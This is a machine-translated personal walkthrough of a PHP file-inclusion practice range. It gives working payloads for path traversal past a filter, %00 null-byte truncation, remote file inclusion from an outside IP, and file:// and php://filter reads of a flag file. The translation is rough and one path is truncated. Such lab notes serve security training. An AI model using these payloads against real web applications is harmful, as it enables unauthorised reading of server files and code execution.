DAY15： The document contains the vulnerability range clearance manual （ Self use file-include shooting range ）

Pass-01、 Basics file Read

http://172.16.0.193/file-include/01/index.php?file=1.txt

analysis 1.txt The content is php Format ,phpinfo Parsing succeeded

Pass-03、 Filter …/（ Path double write splicing ）

Use ：

.+ ../ +./          -------- As a  ../

Check the last directory info.txt

Pass-04、%00 truncation

need php Version less than 5.3.8 as well as magic_quotes_gpc = Off

172.16.0.193/file-include/04/index.php?file=1.txt%00

Pass-05、 The remote file contains

php edition ：5.2.17

（1） The remote include file path must be absolute

（2） Included files cannot be parsed by the server , Such as php file

172.16.0.193/file-include/05/index.php?file=http://123.56.226.153/info.txt

Pass-07、file:// Fake protocol

php edition ：5.2.17

（1）file:// —  Used to access the local file system 
（2）php edition ：5.0 above 
（3） yes  PHP  Default encapsulation protocol used 
（4） When a relative path is specified （ Don't to /、\、\\ or  Windows  Path starting with drive letter ） The path provided will be based on the current working directory 
（5） Syntax of the agreement ：php://filter:/<action>=<name>

The containing file path must be absolute

http://172.16.0.193/file-include/07/index.php?file=file:D:\phpStudy\PHPTutorial\WWW\file-include\07\flag.tx

http://172.16.0.193/file-include/07/index.php?file=php://filter/read=convert.base64-
encode/resource=flag.txt

convert.base64-encode: Transform the content of the data stream into base64 code 

base64-encode: Transform the content of the data stream into base64 code

[ Outside the chain picture transfer in ...(img-s9kVOVKe-1658928781945)]